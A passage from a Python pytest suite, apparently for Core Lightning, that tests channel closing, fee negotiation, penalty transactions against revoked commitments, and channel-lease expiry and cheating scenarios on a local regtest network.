disconnects = ['-WIRE_CLOSING_SIGNED',
'@WIRE_CLOSING_SIGNED',
'+WIRE_CLOSING_SIGNED']
l1, l2 = node_factory.line_graph(2, opts=[{'disconnect': disconnects,
'may_reconnect': True},
{'may_reconnect': True}])
l1.pay(l2, 200000000)
assert bitcoind.rpc.getmempoolinfo()['size'] == 0
l1.rpc.close(l2.info['id'])
l1.daemon.wait_for_log(r'State changed from CHANNELD_NORMAL to CHANNELD_SHUTTING_DOWN')
l2.daemon.wait_for_log(r'State changed from CHANNELD_NORMAL to CHANNELD_SHUTTING_DOWN')
# Now verify that the closing tx is in the mempool.
bitcoind.generate_block(6, wait_for_mempool=1)
sync_blockheight(bitcoind, [l1, l2])
for n in [l1, l2]:
# Ensure we actually got a mutual close.
n.daemon.wait_for_log(r'Resolved FUNDING_TRANSACTION/FUNDING_OUTPUT by MUTUAL_CLOSE')
@pytest.mark.developer("needs DEVELOPER=1")
def test_closing_specified_destination(node_factory, bitcoind, chainparams):
l1, l2, l3, l4 = node_factory.get_nodes(4)
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
l1.rpc.connect(l3.info['id'], 'localhost', l3.port)
l1.rpc.connect(l4.info['id'], 'localhost', l4.port)
chan12, _ = l1.fundchannel(l2, 10**6)
chan13, _ = l1.fundchannel(l3, 10**6)
chan14, _ = l1.fundchannel(l4, 10**6)
l1.pay(l2, 100000000)
l1.pay(l3, 100000000)
l1.pay(l4, 100000000)
bitcoind.generate_block(5)
addr = chainparams['example_addr']
l1.rpc.close(chan12, None, addr)
l1.rpc.call('close', {'id': chan13, 'destination': addr})
l1.rpc.call('close', [chan14, None, addr])
l1.daemon.wait_for_logs([' to CLOSINGD_SIGEXCHANGE'] * 3)
# Both nodes should have disabled the channel in their view
wait_for(lambda: len(l1.getactivechannels()) == 0)
wait_for(lambda: bitcoind.rpc.getmempoolinfo()['size'] == 3)
# Now grab the close transaction
closetxs = {}
for i, n in enumerate([l2, l3, l4]):
billboard = only_one(l1.rpc.listpeers(n.info['id'])['peers'][0]['channels'])['status'][0]
m = re.search(r'CLOSINGD_SIGEXCHANGE.* tx:([a-f0-9]{64})', billboard)
closetxs[n] = m.group(1)
bitcoind.generate_block(1)
sync_blockheight(bitcoind, [l1, l2, l3, l4])
# l1 can't spent the output to addr.
for txid in closetxs.values():
assert not l1.daemon.is_in_log(r'Owning output.* \(SEGWIT\).* txid {}.* CONFIRMED'.format(txid))
# Check the txid has at least 1 confirmation
for n, txid in closetxs.items():
n.daemon.wait_for_log(r'Owning output.* \(SEGWIT\).* txid {}.* CONFIRMED'.format(txid))
for n in [l2, l3, l4]:
# Make sure both nodes have grabbed their close tx funds
closetx = closetxs[n]
outputs = n.rpc.listfunds()['outputs']
assert closetx in set([o['txid'] for o in outputs])
output_num2 = [o for o in outputs if o['txid'] == closetx][0]['output']
output_num1 = 0 if output_num2 == 1 else 1
# Check the another address is addr
assert addr == scriptpubkey_addr(bitcoind.rpc.gettxout(closetx, output_num1)['scriptPubKey'])
assert 1 == bitcoind.rpc.gettxout(closetx, output_num1)['confirmations']
def closing_negotiation_step(node_factory, bitcoind, chainparams, opts):
def feerate_for(target, minimum=0, maximum=10000000):
"""Binary search to find feerate"""
assert minimum != maximum
mid = (minimum + maximum) // 2
mid_fee = closing_fee(mid, 1)
if mid_fee > target:
return feerate_for(target, minimum, mid)
elif mid_fee < target:
return feerate_for(target, mid, maximum)
else:
return mid
orate = feerate_for(21000) # closing fee negotiation starts at 21000
prate = feerate_for(20000) # closing fee negotiation starts at 20000
opener, peer = node_factory.line_graph(2, opts=[{'feerates': (orate, orate, orate, orate)},
{'feerates': (prate, prate, prate, prate)}])
opener_id = opener.info['id']
peer_id = peer.info['id']
assert bitcoind.rpc.getmempoolinfo()['size'] == 0
if opts['close_initiated_by'] == 'opener':
opener.rpc.close(peer_id=peer_id, fee_negotiation_step=opts['fee_negotiation_step'])
else:
assert opts['close_initiated_by'] == 'peer'
peer.rpc.close(peer_id=opener_id, fee_negotiation_step=opts['fee_negotiation_step'])
# Get the proclaimed closing fee from the two nodes' statuses
status_agreed_regex = re.compile("agreed on a closing fee of ([0-9]+) satoshi")
# [fee_from_opener_status, fee_from_peer_status]
fees_from_status = [None, None]
def get_fee_from_status(node, peer_id, i):
nonlocal fees_from_status
peer = only_one(node.rpc.listpeers(peer_id)['peers'])
channel = only_one(peer['channels'])
status = channel['status'][0]
m = status_agreed_regex.search(status)
if not m:
return False
fees_from_status[i] = int(m.group(1))
return True
wait_for(lambda: get_fee_from_status(opener, peer_id, 0))
wait_for(lambda: get_fee_from_status(peer, opener_id, 1))
assert opts['expected_close_fee'] == fees_from_status[0]
assert opts['expected_close_fee'] == fees_from_status[1]
# Get the closing transaction from the bitcoind mempool and get its fee
mempool = None
mempool_tx_ids = None
def get_mempool_when_size_1():
nonlocal mempool, mempool_tx_ids
mempool = bitcoind.rpc.getrawmempool(True)
mempool_tx_ids = list(mempool.keys())
return len(mempool_tx_ids) == 1
wait_for(get_mempool_when_size_1)
close_tx_id = mempool_tx_ids[0]
fee_mempool = round(mempool[close_tx_id]['fee'] * 10**8)
assert opts['expected_close_fee'] == fee_mempool
@unittest.skipIf(EXPERIMENTAL_FEATURES, "anchors uses quick-close, not negotiation")
def test_closing_negotiation_step_30pct(node_factory, bitcoind, chainparams):
"""Test that the closing fee negotiation step works, 30%"""
opts = {}
opts['fee_negotiation_step'] = '30%'
opts['close_initiated_by'] = 'opener'
opts['expected_close_fee'] = 20537 if not chainparams['elements'] else 26046
closing_negotiation_step(node_factory, bitcoind, chainparams, opts)
opts['close_initiated_by'] = 'peer'
opts['expected_close_fee'] = 20233 if not chainparams['elements'] else 25657
closing_negotiation_step(node_factory, bitcoind, chainparams, opts)
@unittest.skipIf(EXPERIMENTAL_FEATURES, "anchors uses quick-close, not negotiation")
def test_closing_negotiation_step_100pct(node_factory, bitcoind, chainparams):
"""Test that the closing fee negotiation step works, 100%"""
opts = {}
opts['fee_negotiation_step'] = '100%'
opts['close_initiated_by'] = 'opener'
opts['expected_close_fee'] = 20001 if not chainparams['elements'] else 25366
closing_negotiation_step(node_factory, bitcoind, chainparams, opts)
# The close fee of 20499 looks strange in this case - one would expect
# to have a number close to 21000. This is because
# * the range is initially set to [20000 (peer), 21000 (opener)]
# * the opener is always first to propose, he uses 50% step, so he proposes 20500
# * the range is narrowed to [20001, 20499] and the peer proposes 20499
opts['close_initiated_by'] = 'peer'
opts['expected_close_fee'] = 20499 if not chainparams['elements'] else 25998
closing_negotiation_step(node_factory, bitcoind, chainparams, opts)
@unittest.skipIf(EXPERIMENTAL_FEATURES, "anchors uses quick-close, not negotiation")
def test_closing_negotiation_step_1sat(node_factory, bitcoind, chainparams):
"""Test that the closing fee negotiation step works, 1sat"""
opts = {}
opts['fee_negotiation_step'] = '1'
opts['close_initiated_by'] = 'opener'
opts['expected_close_fee'] = 20989 if not chainparams['elements'] else 26624
closing_negotiation_step(node_factory, bitcoind, chainparams, opts)
opts['close_initiated_by'] = 'peer'
opts['expected_close_fee'] = 20010 if not chainparams['elements'] else 25373
closing_negotiation_step(node_factory, bitcoind, chainparams, opts)
@unittest.skipIf(EXPERIMENTAL_FEATURES, "anchors uses quick-close, not negotiation")
def test_closing_negotiation_step_700sat(node_factory, bitcoind, chainparams):
"""Test that the closing fee negotiation step works, 700sat"""
opts = {}
opts['fee_negotiation_step'] = '700'
opts['close_initiated_by'] = 'opener'
opts['expected_close_fee'] = 20151 if not chainparams['elements'] else 25650
closing_negotiation_step(node_factory, bitcoind, chainparams, opts)
opts['close_initiated_by'] = 'peer'
opts['expected_close_fee'] = 20499 if not chainparams['elements'] else 25998
closing_negotiation_step(node_factory, bitcoind, chainparams, opts)
@pytest.mark.developer("needs DEVELOPER=1")
def test_penalty_inhtlc(node_factory, bitcoind, executor, chainparams):
"""Test penalty transaction with an incoming HTLC"""
# We track channel balances, to verify that accounting is ok.
coin_mvt_plugin = os.path.join(os.getcwd(), 'tests/plugins/coin_movements.py')
# We suppress each one after first commit; HTLC gets added not fulfilled.
# Feerates identical so we don't get gratuitous commit to update them
l1, l2 = node_factory.line_graph(2, opts=[{'disconnect': ['=WIRE_COMMITMENT_SIGNED-nocommit'],
'may_fail': True,
'feerates': (7500, 7500, 7500, 7500),
'allow_broken_log': True,
'plugin': coin_mvt_plugin},
{'disconnect': ['=WIRE_COMMITMENT_SIGNED-nocommit'],
'plugin': coin_mvt_plugin}])
channel_id = first_channel_id(l1, l2)
# Now, this will get stuck due to l1 commit being disabled..
t = executor.submit(l1.pay, l2, 100000000)
assert len(l1.getactivechannels()) == 2
assert len(l2.getactivechannels()) == 2
# They should both have commitments blocked now.
l1.daemon.wait_for_log('=WIRE_COMMITMENT_SIGNED-nocommit')
l2.daemon.wait_for_log('=WIRE_COMMITMENT_SIGNED-nocommit')
# Make sure l1 got l2's commitment to the HTLC, and sent to master.
l1.daemon.wait_for_log('got commitsig')
# Take our snapshot.
tx = l1.rpc.dev_sign_last_tx(l2.info['id'])['tx']
# Let them continue
l1.rpc.dev_reenable_commit(l2.info['id'])
l2.rpc.dev_reenable_commit(l1.info['id'])
# Should fulfill.
l1.daemon.wait_for_log('peer_in WIRE_UPDATE_FULFILL_HTLC')
l1.daemon.wait_for_log('peer_out WIRE_REVOKE_AND_ACK')
l2.daemon.wait_for_log('peer_out WIRE_UPDATE_FULFILL_HTLC')
l1.daemon.wait_for_log('peer_in WIRE_REVOKE_AND_ACK')
# Payment should now complete.
t.result(timeout=10)
# Now we really mess things up!
bitcoind.rpc.sendrawtransaction(tx)
bitcoind.generate_block(1)
l2.daemon.wait_for_log(' to ONCHAIN')
# FIXME: l1 should try to stumble along!
wait_for(lambda: len(l2.getactivechannels()) == 0)
# l2 should spend all of the outputs (except to-us).
# Could happen in any order, depending on commitment tx.
needle = l2.daemon.logsearch_start
l2.wait_for_onchaind_broadcast('OUR_PENALTY_TX',
'THEIR_REVOKED_UNILATERAL/DELAYED_CHEAT_OUTPUT_TO_THEM')
l2.daemon.logsearch_start = needle
l2.wait_for_onchaind_broadcast('OUR_PENALTY_TX',
'THEIR_REVOKED_UNILATERAL/THEIR_HTLC')
# FIXME: test HTLC tx race!
bitcoind.generate_block(100)
sync_blockheight(bitcoind, [l2])
wait_for(lambda: len(l2.rpc.listpeers()['peers']) == 0)
# Do one last pass over the logs to extract the reactions l2 sent
l2.daemon.logsearch_start = needle
needles = [
# The first needle will match, but since we don't have a direct output
# for l2 it won't result in an output, hence the comment:
# r'Resolved FUNDING_TRANSACTION/FUNDING_OUTPUT by THEIR_REVOKED_UNILATERAL .([a-f0-9]{64}).',
r'Resolved THEIR_REVOKED_UNILATERAL/DELAYED_CHEAT_OUTPUT_TO_THEM by our proposal OUR_PENALTY_TX .([a-f0-9]{64}).',
r'Resolved THEIR_REVOKED_UNILATERAL/THEIR_HTLC by our proposal OUR_PENALTY_TX .([a-f0-9]{64}).',
]
matches = list(map(l2.daemon.is_in_log, needles))
# Now extract the txids for these responses
txids = set([re.search(r'\(([0-9a-f]{64})\)', m).group(1) for m in matches])
# We should have one confirmed output for each of the above reactions in
# the list of funds we own.
outputs = l2.rpc.listfunds()['outputs']
assert [o['status'] for o in outputs] == ['confirmed'] * 2
assert set([o['txid'] for o in outputs]) == txids
assert account_balance(l2, channel_id) == 0
@pytest.mark.developer("needs DEVELOPER=1")
def test_penalty_outhtlc(node_factory, bitcoind, executor, chainparams):
"""Test penalty transaction with an outgoing HTLC"""
# We track channel balances, to verify that accounting is ok.
coin_mvt_plugin = os.path.join(os.getcwd(), 'tests/plugins/coin_movements.py')
# First we need to get funds to l2, so suppress after second.
# Feerates identical so we don't get gratuitous commit to update them
l1, l2 = node_factory.line_graph(2,
opts=[{'disconnect': ['=WIRE_COMMITMENT_SIGNED*3-nocommit'],
'may_fail': True,
'feerates': (7500, 7500, 7500, 7500),
'allow_broken_log': True,
'plugin': coin_mvt_plugin},
{'disconnect': ['=WIRE_COMMITMENT_SIGNED*3-nocommit'],
'plugin': coin_mvt_plugin}])
channel_id = first_channel_id(l1, l2)
# Move some across to l2.
l1.pay(l2, 200000000)
assert not l1.daemon.is_in_log('=WIRE_COMMITMENT_SIGNED')
assert not l2.daemon.is_in_log('=WIRE_COMMITMENT_SIGNED')
# Now, this will get stuck due to l1 commit being disabled..
t = executor.submit(l2.pay, l1, 100000000)
# Make sure we get signature from them.
l1.daemon.wait_for_log('peer_in WIRE_UPDATE_ADD_HTLC')
l1.daemon.wait_for_log('peer_in WIRE_COMMITMENT_SIGNED')
# They should both have commitments blocked now.
l1.daemon.wait_for_log('dev_disconnect: =WIRE_COMMITMENT_SIGNED')
l2.daemon.wait_for_log('dev_disconnect: =WIRE_COMMITMENT_SIGNED')
# Make sure both sides got revoke_and_ack for that commitment.
l1.daemon.wait_for_log('peer_in WIRE_REVOKE_AND_ACK')
l2.daemon.wait_for_log('peer_in WIRE_REVOKE_AND_ACK')
# Take our snapshot.
tx = l1.rpc.dev_sign_last_tx(l2.info['id'])['tx']
# Let them continue
l1.rpc.dev_reenable_commit(l2.info['id'])
l2.rpc.dev_reenable_commit(l1.info['id'])
# Thread should complete.
t.result(timeout=10)
# Make sure both sides got revoke_and_ack for final.
l1.daemon.wait_for_log('peer_in WIRE_REVOKE_AND_ACK')
l2.daemon.wait_for_log('peer_in WIRE_REVOKE_AND_ACK')
# Now we really mess things up!
bitcoind.rpc.sendrawtransaction(tx)
bitcoind.generate_block(1)
l2.daemon.wait_for_log(' to ONCHAIN')
# FIXME: l1 should try to stumble along!
# l2 should spend all of the outputs (except to-us).
# Could happen in any order, depending on commitment tx.
needle = l2.daemon.logsearch_start
l2.wait_for_onchaind_broadcast('OUR_PENALTY_TX',
'THEIR_REVOKED_UNILATERAL/DELAYED_CHEAT_OUTPUT_TO_THEM')
l2.daemon.logsearch_start = needle
l2.wait_for_onchaind_broadcast('OUR_PENALTY_TX',
'THEIR_REVOKED_UNILATERAL/OUR_HTLC')
l2.daemon.logsearch_start = needle
l2.daemon.wait_for_log('Ignoring output.*: THEIR_REVOKED_UNILATERAL/OUTPUT_TO_US')
# FIXME: test HTLC tx race!
# 100 blocks later, all resolved.
bitcoind.generate_block(100)
sync_blockheight(bitcoind, [l2])
wait_for(lambda: len(l2.rpc.listpeers()['peers']) == 0)
# Do one last pass over the logs to extract the reactions l2 sent
l2.daemon.logsearch_start = needle
needles = [
r'Resolved FUNDING_TRANSACTION/FUNDING_OUTPUT by THEIR_REVOKED_UNILATERAL .([a-f0-9]{64}).',
r'Resolved THEIR_REVOKED_UNILATERAL/DELAYED_CHEAT_OUTPUT_TO_THEM by our proposal OUR_PENALTY_TX .([a-f0-9]{64}).',
r'Resolved THEIR_REVOKED_UNILATERAL/OUR_HTLC by our proposal OUR_PENALTY_TX .([a-f0-9]{64}).',
]
matches = list(map(l2.daemon.is_in_log, needles))
# Now extract the txids for these responses
txids = set([re.search(r'\(([0-9a-f]{64})\)', m).group(1) for m in matches])
# We should have one confirmed output for each of the above reactions in
# the list of funds we own.
outputs = l2.rpc.listfunds()['outputs']
assert [o['status'] for o in outputs] == ['confirmed'] * 3
assert set([o['txid'] for o in outputs]) == txids
assert account_balance(l2, channel_id) == 0
@unittest.skipIf(TEST_NETWORK != 'regtest', 'elementsd doesnt yet support PSBT features we need')
@pytest.mark.openchannel('v2')
@pytest.mark.slow_test
@pytest.mark.developer("requres 'dev-queryrates'")
def test_channel_lease_falls_behind(node_factory, bitcoind):
'''
If our peer falls too far behind/doesn't send us an update for
their blockheight, the lessor fails the channel
'''
opts = [{'funder-policy': 'match', 'funder-policy-mod': 100,
'lease-fee-base-msat': '100sat', 'lease-fee-basis': 100},
{'funder-policy': 'match', 'funder-policy-mod': 100,
'lease-fee-base-msat': '100sat', 'lease-fee-basis': 100}]
l1, l2, = node_factory.get_nodes(2, opts=opts)
amount = 500000
feerate = 2000
l1.fundwallet(20000000)
l2.fundwallet(20000000)
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
rates = l1.rpc.dev_queryrates(l2.info['id'], amount, amount)
wait_for(lambda: len(l1.rpc.listpeers(l2.info['id'])['peers']) == 0)
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
# l1 leases a channel from l2
l1.rpc.fundchannel(l2.info['id'], amount, request_amt=amount,
feerate='{}perkw'.format(feerate),
compact_lease=rates['compact_lease'])
# sink the funding transaction
bitcoind.generate_block(1)
# stop l1
l1.stop()
# advance blockchain 1008 blocks, the lessor should drop to chain
bitcoind.generate_block(1008)
sync_blockheight(bitcoind, [l2])
l2.daemon.wait_for_log('Offline peer is too far behind, terminating')
@unittest.skipIf(TEST_NETWORK != 'regtest', 'elementsd doesnt yet support PSBT features we need')
@pytest.mark.openchannel('v2')
@pytest.mark.developer("requres 'dev-queryrates'")
@pytest.mark.slow_test
def test_channel_lease_post_expiry(node_factory, bitcoind):
opts = {'funder-policy': 'match', 'funder-policy-mod': 100,
'lease-fee-base-msat': '100sat', 'lease-fee-basis': 100,
'may_reconnect': True}
l1, l2, = node_factory.get_nodes(2, opts=opts)
feerate = 2000
amount = 500000
l1.fundwallet(20000000)
l2.fundwallet(20000000)
# l1 leases a channel from l2
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
rates = l1.rpc.dev_queryrates(l2.info['id'], amount, amount)
wait_for(lambda: len(l1.rpc.listpeers(l2.info['id'])['peers']) == 0)
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
l1.rpc.fundchannel(l2.info['id'], amount, request_amt=amount,
feerate='{}perkw'.format(feerate),
compact_lease=rates['compact_lease'])
est_fees = calc_lease_fee(amount, feerate, rates)
# This should be the accepter's amount
fundings = only_one(only_one(l1.rpc.listpeers()['peers'])['channels'])['funding']
assert Millisatoshi(est_fees + amount * 1000) == Millisatoshi(fundings['remote_msat'])
bitcoind.generate_block(6)
l1.daemon.wait_for_log('to CHANNELD_NORMAL')
wait_for(lambda: [c['active'] for c in l1.rpc.listchannels(l1.get_channel_scid(l2))['channels']] == [True, True])
# send some payments, mine a block or two
inv = l2.rpc.invoice(10**4, '1', 'no_1')
l1.rpc.pay(inv['bolt11'])
# l2 attempts to close a channel that it leased, should fail
with pytest.raises(RpcError, match=r'Peer leased this channel from us'):
l2.rpc.close(l1.get_channel_scid(l2))
bitcoind.generate_block(6)
sync_blockheight(bitcoind, [l1, l2])
# make sure we're at the right place for the csv lock
l2.daemon.wait_for_log('Blockheight: SENT_ADD_ACK_COMMIT->RCVD_ADD_ACK_REVOCATION LOCAL now 115')
# We need to give l1-l2 time to update their blockheights
bitcoind.generate_block(1000)
sync_blockheight(bitcoind, [l1, l2])
l1.daemon.wait_for_log('peer_out WIRE_UPDATE_BLOCKHEIGHT')
bitcoind.generate_block(1000)
sync_blockheight(bitcoind, [l1, l2])
l1.daemon.wait_for_log('peer_out WIRE_UPDATE_BLOCKHEIGHT')
bitcoind.generate_block(1000)
sync_blockheight(bitcoind, [l1, l2])
l1.daemon.wait_for_log('peer_out WIRE_UPDATE_BLOCKHEIGHT')
bitcoind.generate_block(1000)
sync_blockheight(bitcoind, [l1, l2])
l1.daemon.wait_for_log('peer_out WIRE_UPDATE_BLOCKHEIGHT')
bitcoind.generate_block(32)
sync_blockheight(bitcoind, [l1, l2])
l1.daemon.wait_for_log('peer_out WIRE_UPDATE_BLOCKHEIGHT')
# l1<->l2 mutual close should work
chan = l1.get_channel_scid(l2)
l2.rpc.connect(l1.info['id'], 'localhost', l1.port)
l1.rpc.close(chan)
l2.daemon.wait_for_log('State changed from CLOSINGD_SIGEXCHANGE to CLOSINGD_COMPLETE')
@unittest.skipIf(TEST_NETWORK != 'regtest', 'elementsd doesnt yet support PSBT features we need')
@pytest.mark.openchannel('v2')
@pytest.mark.slow_test
@pytest.mark.developer("requres 'dev-queryrates'")
def test_channel_lease_unilat_closes(node_factory, bitcoind):
'''
Check that channel leases work
l1-l2: l1 leases funds from l2; l1 goes to chain unilaterally
l2-l3: l2 leases funds from l3; l3 goes to chain unilaterally
'''
opts = {'funder-policy': 'match', 'funder-policy-mod': 100,
'lease-fee-base-msat': '100sat', 'lease-fee-basis': 100,
'funder-lease-requests-only': False}
l1, l2, l3 = node_factory.get_nodes(3, opts=opts)
# Allow l2 some warnings
l2.allow_warning = True
feerate = 2000
amount = 500000
l1.fundwallet(20000000)
l2.fundwallet(20000000)
l3.fundwallet(20000000)
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
rates = l1.rpc.dev_queryrates(l2.info['id'], amount, amount)
wait_for(lambda: len(l1.rpc.listpeers(l2.info['id'])['peers']) == 0)
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
# l1 leases a channel from l2
l1.rpc.fundchannel(l2.info['id'], amount, request_amt=amount,
feerate='{}perkw'.format(feerate),
compact_lease=rates['compact_lease'])
# l2 leases a channel from l3
l2.rpc.connect(l3.info['id'], 'localhost', l3.port)
rates = l2.rpc.dev_queryrates(l3.info['id'], amount, amount)
wait_for(lambda: len(l2.rpc.listpeers(l3.info['id'])['peers']) == 0)
l2.rpc.connect(l3.info['id'], 'localhost', l3.port)
l2.rpc.fundchannel(l3.info['id'], amount, request_amt=amount,
feerate='{}perkw'.format(feerate), minconf=0,
compact_lease=rates['compact_lease'])
est_fees = calc_lease_fee(amount, feerate, rates)
# This should be the accepter's amount
fundings = only_one(only_one(l1.rpc.listpeers()['peers'])['channels'])['funding']
assert Millisatoshi(est_fees + amount * 1000) == Millisatoshi(fundings['remote_msat'])
bitcoind.generate_block(6)
l1.daemon.wait_for_log('to CHANNELD_NORMAL')
l3.daemon.wait_for_log('to CHANNELD_NORMAL')
wait_for(lambda: [c['active'] for c in l1.rpc.listchannels(l1.get_channel_scid(l2))['channels']] == [True, True])
wait_for(lambda: [c['active'] for c in l3.rpc.listchannels(l3.get_channel_scid(l2))['channels']] == [True, True])
# send some payments, mine a block or two
inv = l2.rpc.invoice(10**4, '1', 'no_1')
l1.rpc.pay(inv['bolt11'])
inv = l2.rpc.invoice(10**4, '3', 'no_3')
l3.rpc.pay(inv['bolt11'])
bitcoind.generate_block(6)
sync_blockheight(bitcoind, [l1, l2, l3])
# make sure we're at the right place for the csv lock
l2.daemon.wait_for_log('Blockheight: SENT_ADD_ACK_COMMIT->RCVD_ADD_ACK_REVOCATION LOCAL now 110')
l2.stop()
# unilateral close channels l1<->l2 & l3<->l2
l1.rpc.close(l2.info['id'], 1)
l3.rpc.close(l2.info['id'], 1, force_lease_closed=True)
# Wait til to_self_delay expires, l1 should claim to_local back
bitcoind.generate_block(10, wait_for_mempool=2)
l1.daemon.wait_for_log('Broadcasting OUR_DELAYED_RETURN_TO_WALLET')
bitcoind.generate_block(1, wait_for_mempool=1)
l1.daemon.wait_for_log('Resolved OUR_UNILATERAL/DELAYED_OUTPUT_TO_US by our proposal OUR_DELAYED_RETURN_TO_WALLET')
assert len(l1.rpc.listfunds()['outputs']) == 2
l2.start()
search_start = l2.daemon.logsearch_start
log = l2.daemon.wait_for_log('adding utxo to watch .* csv 40.*')
utxo1 = re.match('.* adding utxo to watch (.*), csv .*', log).group(1)
l2.daemon.logsearch_start = search_start
log = l2.daemon.wait_for_log('adding utxo to watch .* csv 1')
utxo3 = re.match('.* adding utxo to watch (.*), csv 1', log).group(1)
# we *shouldn't* be able to spend it, there's a lock on it
with pytest.raises(RpcError, match='UTXO .* is csv locked'):
l2.rpc.withdraw(l2.rpc.newaddr()['bech32'], "all", utxos=[utxo1])
# we *can* spend the 1csv lock one
l2.rpc.withdraw(l2.rpc.newaddr()['bech32'], "all", utxos=[utxo3])
# This can timeout, so do it in four easy stages.
for i in range(4):
bitcoind.generate_block(4032 // 4)
sync_blockheight(bitcoind, [l2, l3])
l2.rpc.withdraw(l2.rpc.newaddr()['bech32'], "all", utxos=[utxo1])
# l3 cleans up their to-self after their lease expires
assert l3.daemon.is_in_log('Broadcasting OUR_DELAYED_RETURN_TO_WALLET')
@unittest.skipIf(TEST_NETWORK != 'regtest', 'elementsd doesnt yet support PSBT features we need')
@pytest.mark.openchannel('v2')
@unittest.skipIf(os.getenv('TEST_DB_PROVIDER', 'sqlite3') != 'sqlite3', "Makes use of the sqlite3 db")
@pytest.mark.developer("requres 'dev-queryrates'")
def test_channel_lease_lessor_cheat(node_factory, bitcoind, chainparams):
'''
Check that lessee can recover funds if lessor cheats
'''
opts = [{'funder-policy': 'match', 'funder-policy-mod': 100,
'lease-fee-base-msat': '100sat', 'lease-fee-basis': 100,
'may_reconnect': True, 'allow_warning': True},
{'funder-policy': 'match', 'funder-policy-mod': 100,
'lease-fee-base-msat': '100sat', 'lease-fee-basis': 100,
'may_reconnect': True, 'allow_broken_log': True}]
l1, l2, = node_factory.get_nodes(2, opts=opts)
amount = 500000
feerate = 2000
l1.fundwallet(20000000)
l2.fundwallet(20000000)
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
rates = l1.rpc.dev_queryrates(l2.info['id'], amount, amount)
wait_for(lambda: len(l1.rpc.listpeers(l2.info['id'])['peers']) == 0)
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
# l1 leases a channel from l2
l1.rpc.fundchannel(l2.info['id'], amount, request_amt=amount,
feerate='{}perkw'.format(feerate),
compact_lease=rates['compact_lease'])
bitcoind.generate_block(6)
l1.daemon.wait_for_log('to CHANNELD_NORMAL')
wait_for(lambda: [c['active'] for c in l1.rpc.listchannels(l1.get_channel_scid(l2))['channels']] == [True, True])
wait_for(lambda: [c['active'] for c in l2.rpc.listchannels(l2.get_channel_scid(l1))['channels']] == [True, True])
# send some payments, mine a block or two
inv = l2.rpc.invoice(10**4, '1', 'no_1')
l1.rpc.pay(inv['bolt11'])
bitcoind.generate_block(1)
# make database snapshot of l2
l2.stop()
l2_db_path = os.path.join(l2.daemon.lightning_dir, chainparams['name'], 'lightningd.sqlite3')
l2_db_path_bak = os.path.join(l2.daemon.lightning_dir, chainparams['name'], 'lightningd.sqlite3.bak')
copyfile(l2_db_path, l2_db_path_bak)
l2.start(wait_for_bitcoind_sync=True)
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
sync_blockheight(bitcoind, [l2])
# push some money from l2->l1, so the commit counter advances
inv = l1.rpc.invoice(10**5, '2', 'no_2')
l2.rpc.pay(inv['bolt11'])
# stop both nodes, roll back l2's database
l2.stop()
l1.stop()
copyfile(l2_db_path_bak, l2_db_path)
# start l2 and force close channel with l1 while l1 is still offline
l2.start()
sync_blockheight(bitcoind, [l2])
l2.rpc.close(l1.info['id'], 1, force_lease_closed=True)
bitcoind.generate_block(1, wait_for_mempool=1)
l1.start()
sync_blockheight(bitcoind, [l1])
l1.daemon.wait_for_logs(['Broadcasting OUR_PENALTY_TX',
' Propose handling THEIR_REVOKED_UNILATERAL/DELAYED_CHEAT_OUTPUT_TO_THEM by OUR_PENALTY_TX'])
bitcoind.generate_block(1, wait_for_mempool=1)
# l2 sees that l1 has spent their coins!
l2.daemon.wait_for_log('Unknown spend of OUR_UNILATERAL/DELAYED_OUTPUT_TO_US by')
@unittest.skipIf(TEST_NETWORK != 'regtest', 'elementsd doesnt yet support PSBT features we need')
@pytest.mark.openchannel('v2')
@unittest.skipIf(os.getenv('TEST_DB_PROVIDER', 'sqlite3') != 'sqlite3', "Makes use of the sqlite3 db")
@pytest.mark.developer("requres 'dev-queryrates'")
def test_channel_lease_lessee_cheat(node_factory, bitcoind, chainparams):
'''
Check that lessor can recover funds if lessee cheats
'''
opts = [{'funder-policy': 'match', 'funder-policy-mod': 100,
'lease-fee-base-msat': '100sat', 'lease-fee-basis': 100,
'may_reconnect': True, 'allow_broken_log': True},
{'funder-policy': 'match', 'funder-policy-mod': 100,
'lease-fee-base-msat': '100sat', 'lease-fee-basis': 100,
'may_reconnect': True}]
l1, l2, = node_factory.get_nodes(2, opts=opts)
amount = 500000
feerate = 2000
l1.fundwallet(20000000)
l2.fundwallet(20000000)
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
rates = l1.rpc.dev_queryrates(l2.info['id'], amount, amount)
wait_for(lambda: len(l1.rpc.listpeers(l2.info['id'])['peers']) == 0)
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
# l1 leases a channel from l2
l1.rpc.fundchannel(l2.info['id'], amount, request_amt=amount,
feerate='{}perkw'.format(feerate),
compact_lease=rates['compact_lease'])
bitcoind.generate_block(6)
l1.daemon.wait_for_log('to CHANNELD_NORMAL')
wait_for(lambda: [c['active'] for c in l1.rpc.listchannels(l1.get_channel_scid(l2))['channels']] == [True, True])
wait_for(lambda: [c['active'] for c in l2.rpc.listchannels(l2.get_channel_scid(l1))['channels']] == [True, True])
# send some payments, mine a block or two
inv = l2.rpc.invoice(10**4, '1', 'no_1')
l1.rpc.pay(inv['bolt11'])
bitcoind.generate_block(1)
# make database snapshot of l1
l1.stop()
l1_db_path = os.path.join(l1.daemon.lightning_dir, chainparams['name'], 'lightningd.sqlite3')
l1_db_path_bak = os.path.join(l1.daemon.lightning_dir, chainparams['name'], 'lightningd.sqlite3.bak')
copyfile(l1_db_path, l1_db_path_bak)
l1.start()
l1.rpc.connect(l1.info['id'], 'localhost', l1.port)
sync_blockheight(bitcoind, [l1])
# push some money from l2->l1, so the commit counter advances
inv = l1.rpc.invoice(10**5, '2', 'no_2')
l2.rpc.pay(inv['bolt11'])
# stop both nodes, roll back l1's database
l1.stop()
l2.stop()
copyfile(l1_db_path_bak, l1_db_path)
# start l1 and force close channel with l2 while l2 is still offline
l1.start()
sync_blockheight(bitcoind, [l1])
l1.rpc.close(l2.info['id'], 1, force_lease_closed=True)
bitcoind.generate_block(1, wait_for_mempool=1)
l2.start()
sync_blockheight(bitcoind, [l2])
